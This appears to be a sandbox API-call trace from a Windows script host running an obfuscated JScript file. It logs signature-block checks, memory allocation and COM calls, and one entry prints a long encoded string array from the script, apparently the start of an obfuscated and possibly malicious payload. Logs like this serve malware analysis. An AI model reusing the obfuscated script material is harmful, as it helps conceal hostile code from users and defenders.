	[0048.219] wcsncmp (_String1="rCsEPDhcKacRHCmA==','wozDhsKiwrPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0048.219] wcsncmp (_String1="CsEPDhcKacRHCmA==','wozDhsKiwrPDl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0048.219] wcsncmp (_String1="sEPDhcKacRHCmA==','wozDhsKiwrPDl8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0048.219] wcsncmp (_String1="EPDhcKacRHCmA==','wozDhsKiwrPDl8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0048.219] wcsncmp (_String1="PDhcKacRHCmA==','wozDhsKiwrPDl8Kx", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0048.219] wcsncmp (_String1="DhcKacRHCmA==','wozDhsKiwrPDl8KxF", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0048.219] wcsncmp (_String1="hcKacRHCmA==','wozDhsKiwrPDl8KxFA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0048.219] wcsncmp (_String1="cKacRHCmA==','wozDhsKiwrPDl8KxFAY", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0048.219] wcsncmp (_String1="KacRHCmA==','wozDhsKiwrPDl8KxFAY=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0048.219] wcsncmp (_String1="acRHCmA==','wozDhsKiwrPDl8KxFAY='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0048.219] wcsncmp (_String1="cRHCmA==','wozDhsKiwrPDl8KxFAY=',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0048.219] wcsncmp (_String1="RHCmA==','wozDhsKiwrPDl8KxFAY=','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0048.219] wcsncmp (_String1="HCmA==','wozDhsKiwrPDl8KxFAY=','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0048.219] wcsncmp (_String1="CmA==','wozDhsKiwrPDl8KxFAY=','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0048.219] wcsncmp (_String1="mA==','wozDhsKiwrPDl8KxFAY=','woH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 96
	[0048.219] wcsncmp (_String1="A==','wozDhsKiwrPDl8KxFAY=','woHD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0048.219] wcsncmp (_String1="==','wozDhsKiwrPDl8KxFAY=','woHDt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0048.220] wcsncmp (_String1="=','wozDhsKiwrPDl8KxFAY=','woHDt2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0048.220] wcsncmp (_String1="','wozDhsKiwrPDl8KxFAY=','woHDt2Z", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0048.220] wcsncmp (_String1=",'wozDhsKiwrPDl8KxFAY=','woHDt2Zc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0048.220] wcsncmp (_String1="'wozDhsKiwrPDl8KxFAY=','woHDt2ZcP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0048.220] wcsncmp (_String1="wozDhsKiwrPDl8KxFAY=','woHDt2ZcPM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0048.220] wcsncmp (_String1="ozDhsKiwrPDl8KxFAY=','woHDt2ZcPMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0048.220] wcsncmp (_String1="zDhsKiwrPDl8KxFAY=','woHDt2ZcPMOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0048.220] wcsncmp (_String1="DhsKiwrPDl8KxFAY=','woHDt2ZcPMOsG", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0048.220] wcsncmp (_String1="hsKiwrPDl8KxFAY=','woHDt2ZcPMOsGX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0048.220] wcsncmp (_String1="sKiwrPDl8KxFAY=','woHDt2ZcPMOsGXt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0048.220] wcsncmp (_String1="KiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0048.220] wcsncmp (_String1="iwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0048.220] wcsncmp (_String1="wrPDl8KxFAY=','woHDt2ZcPMOsGXtZQc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0048.220] wcsncmp (_String1="rPDl8KxFAY=','woHDt2ZcPMOsGXtZQcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0048.220] wcsncmp (_String1="PDl8KxFAY=','woHDt2ZcPMOsGXtZQcOI", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0048.220] wcsncmp (_String1="Dl8KxFAY=','woHDt2ZcPMOsGXtZQcOIw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0048.220] wcsncmp (_String1="l8KxFAY=','woHDt2ZcPMOsGXtZQcOIwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0048.220] wcsncmp (_String1="8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0048.220] wcsncmp (_String1="KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0048.220] wcsncmp (_String1="xFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0048.220] wcsncmp (_String1="FAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 57
	[0048.220] wcsncmp (_String1="AY=','woHDt2ZcPMOsGXtZQcOIwrnDj1l", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0048.220] wcsncmp (_String1="Y=','woHDt2ZcPMOsGXtZQcOIwrnDj1lV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 76
	[0048.220] wcsncmp (_String1="=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0048.220] wcsncmp (_String1="','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0048.220] wcsncmp (_String1=",'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0048.220] wcsncmp (_String1="'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOU", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0048.220] wcsncmp (_String1="woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOUR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0048.220] wcsncmp (_String1="oHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0048.220] wcsncmp (_String1="HDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHf", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0048.220] wcsncmp (_String1="Dt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0048.220] wcsncmp (_String1="t2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0048.220] wcsncmp (_String1="2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0048.220] wcsncmp (_String1="ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0048.220] wcsncmp (_String1="cPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0k", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0048.228] wcsncmp (_String1="PMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0048.228] wcsncmp (_String1="MOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0048.228] wcsncmp (_String1="OsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4t", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0048.228] wcsncmp (_String1="sGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0048.228] wcsncmp (_String1="GXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 58
	[0048.228] wcsncmp (_String1="XtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0048.228] wcsncmp (_String1="tZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4R", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0048.228] wcsncmp (_String1="ZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0048.229] wcsncmp (_String1="QcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0048.229] wcsncmp (_String1="cOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0048.229] wcsncmp (_String1="OIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0048.229] wcsncmp (_String1="IwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 60
	[0048.229] wcsncmp (_String1="wrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0048.229] wcsncmp (_String1="rnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0048.229] wcsncmp (_String1="nDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0048.229] wcsncmp (_String1="Dj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Om", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0048.229] wcsncmp (_String1="j1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0048.229] wcsncmp (_String1="1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0048.229] wcsncmp (_String1="lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5J", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0048.229] wcsncmp (_String1="VNsOURHfDgl0kw4tDw4RSw7HCn8Omw5Jp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0048.229] wcsncmp (_String1="NsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0048.229] wcsncmp (_String1="sOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0048.229] wcsncmp (_String1="OURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0048.229] wcsncmp (_String1="URHfDgl0kw4tDw4RSw7HCn8Omw5JpXDot", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 72
	[0048.229] wcsncmp (_String1="RHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0048.229] wcsncmp (_String1="HfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0048.229] wcsncmp (_String1="fDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0048.229] wcsncmp (_String1="Dgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0048.230] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0048.230] CloseCodeAuthzLevel () returned 0x1
	[0048.230] FreeLibrary (hLibModule=0x7fefd710000) returned 1
	[0048.230] ??2@YAPEAX_K@Z () returned 0x36f3f0
	[0048.230] SysStringLen (param_1="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 0x4b68
	[0048.230] GetProcessHeap () returned 0x100000
	[0048.230] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x138430, Size=0x11238) returned 0x16ae20
	[0048.231] ??2@YAPEAX_K@Z () returned 0x36f480
	[0048.231] GetCurrentThreadId () returned 0xba8
	[0048.231] realloc (_Block=0x0, _Size=0xc8) returned 0x36f4e0
	[0048.232] ??2@YAPEAX_K@Z () returned 0x36f5b0
	[0048.232] malloc (_Size=0x1008) returned 0x36a4f0
	[0048.232] ??2@YAPEAX_K@Z () returned 0x36f5f0
	[0048.232] malloc (_Size=0x108) returned 0x367d80
	[0048.232] malloc (_Size=0x208) returned 0x36f7a0
	[0048.233] malloc (_Size=0x200) returned 0x36f9b0
	[0048.233] malloc (_Size=0x408) returned 0x36fbc0
	[0048.233] malloc (_Size=0x2008) returned 0x36b500
	[0048.233] malloc (_Size=0x808) returned 0x36d510
	[0048.234] malloc (_Size=0x1008) returned 0x36dd20
	[0048.235] malloc (_Size=0x4008) returned 0x37dfd0
	[0048.235] malloc (_Size=0x2008) returned 0x381fe0
	[0048.237] malloc (_Size=0x4008) returned 0x383ff0
	[0048.241] free (_Block=0x39c050) 
	[0048.241] free (_Block=0x388000) 
	[0048.241] free (_Block=0x37dfd0) 
	[0048.242] free (_Block=0x36b500) 
	[0048.242] free (_Block=0x36a4f0) 
	[0048.242] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.242] free (_Block=0x3aca20) 
	[0048.242] free (_Block=0x3a8a10) 
	[0048.242] free (_Block=0x3a4070) 
	[0048.242] free (_Block=0x3a0060) 
	[0048.243] free (_Block=0x398040) 
	[0048.243] free (_Block=0x394030) 
	[0048.243] free (_Block=0x390020) 
	[0048.243] free (_Block=0x38c010) 
	[0048.243] free (_Block=0x383ff0) 
	[0048.243] free (_Block=0x381fe0) 
	[0048.243] free (_Block=0x36dd20) 
	[0048.243] free (_Block=0x36d510) 
	[0048.244] free (_Block=0x36fbc0) 
	[0048.244] free (_Block=0x36f7a0) 
	[0048.244] free (_Block=0x367d80) 
	[0048.244] ??2@YAPEAX_K@Z () returned 0x36f5b0
	[0048.244] ??2@YAPEAX_K@Z () returned 0x36f610
	[0048.244] malloc (_Size=0x10) returned 0x36f640
	[0048.244] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x30ef48 | out: ppv=0x30ef48*=0x11f420) returned 0x0
	[0048.344] ??2@YAPEAX_K@Z () returned 0x36f560
	[0048.345] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x7fefec0a1b0, pUnk=0x36f560, riid=0x7fee3376340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x36f598 | out: pdwCookie=0x36f598*=0x100) returned 0x0
	[0048.345] IUnknown:AddRef (This=0x11f420) returned 0x2
	[0048.345] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.345] ??2@YAPEAX_K@Z () returned 0x3bfe90
	[0048.345] ??2@YAPEAX_K@Z () returned 0x36f940
	[0048.346] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x30ef98 | out: ppv=0x30ef98*=0x11f420) returned 0x0
	[0048.346] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.346] ??2@YAPEAX_K@Z () returned 0x36fa00
	[0048.346] ISystemDebugEventFire:IsActive (This=0x1375b0) returned 0x1
	[0048.346] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x30ef38 | out: ppv=0x30ef38*=0x11f420) returned 0x0
	[0048.346] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.347] malloc (_Size=0x2e48) returned 0x36a4f0
	[0048.347] GetCurrentThreadId () returned 0xba8
	[0048.347] ??2@YAPEAX_K@Z () returned 0x36fae0
	[0048.354] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3077b8 | out: ppv=0x3077b8*=0x11f420) returned 0x0
	[0048.356] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.356] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.356] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.356] free (_Block=0x381c70) 
	[0048.356] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.356] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.356] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.356] free (_Block=0x36f040) 
	[0048.356] free (_Block=0x380930) 
	[0048.357] free (_Block=0x3683e0) 
	[0048.357] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.357] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.357] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.357] free (_Block=0x381e20) 
	[0048.357] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.357] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.357] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.357] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.357] free (_Block=0x36ffb0) 
	[0048.357] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.357] free (_Block=0x3c1140) 
	[0048.357] free (_Block=0x367d80) 
	[0048.357] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.357] ??3@YAXPEAX@Z () returned 0x165fff01
	[0048.357] MulDiv (nNumber=111, nNumerator=100, nDenominator=512) returned 22
	[0048.357] IUnknown:Release (This=0x11f420) returned 0x1
	[0048.357] GetTickCount () returned 0x1d49c
	[0048.358] ??2@YAPEAX_K@Z () returned 0x386560
	[0048.358] ??2@YAPEAX_K@Z () returned 0x386590
	[0048.358] ??2@YAPEAX_K@Z () returned 0x3865c0
	[0048.359] ??2@YAPEAX_K@Z () returned 0x3865f0
	[0048.360] ??2@YAPEAX_K@Z () returned 0x386620
	[0048.360] ??2@YAPEAX_K@Z () returned 0x386650
	[0048.361] ??2@YAPEAX_K@Z () returned 0x386680
	[0048.361] ??2@YAPEAX_K@Z () returned 0x3866b0
	[0048.361] ??2@YAPEAX_K@Z () returned 0x3866e0
	[0048.362] ??2@YAPEAX_K@Z () returned 0x386710
